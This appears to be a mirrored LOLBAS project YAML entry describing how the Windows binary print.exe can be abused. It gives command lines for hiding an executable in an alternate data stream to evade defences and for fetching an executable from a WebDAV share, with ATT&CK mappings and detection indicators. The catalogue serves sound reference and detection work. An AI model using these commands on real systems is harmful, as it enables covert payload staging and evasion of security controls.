mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-27 07:18:05 +01:00
46 lines
1.8 KiB
YAML
46 lines
1.8 KiB
YAML
---
|
|
Name: Print.exe
|
|
Description: Used by Windows to send files to the printer
|
|
Author: 'Oddvar Moe'
|
|
Created: 2018-05-25
|
|
Commands:
|
|
- Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
|
|
Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt.
|
|
Usecase: Hide binary file in alternate data stream to potentially bypass defensive counter measures
|
|
Category: ADS
|
|
Privileges: User
|
|
MitreID: T1096
|
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
|
- Command: print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe
|
|
Description: Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe
|
|
Usecase: Copy files
|
|
Category: Copy
|
|
Privileges: User
|
|
MitreID: T1105
|
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
|
- Command: print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe
|
|
Description: Copy File.exe from a network share to the target c:\OutFolder\outfile.exe.
|
|
Usecase: Copy/Download file from remote server
|
|
Category: Copy
|
|
Privileges: User
|
|
MitreID: T1105
|
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
|
Full_Path:
|
|
- Path: C:\Windows\System32\print.exe
|
|
- Path: C:\Windows\SysWOW64\print.exe
|
|
Code_Sample:
|
|
- Code:
|
|
Detection:
|
|
- IOC: Print.exe getting files from internet
|
|
- IOC: Print.exe creating executable files on disk
|
|
Resources:
|
|
- Link: https://twitter.com/Oddvarmoe/status/985518877076541440
|
|
- Link: https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410
|
|
Acknowledgement:
|
|
- Person: Oddvar Moe
|
|
Handle: '@oddvarmoe'
|
|
---
|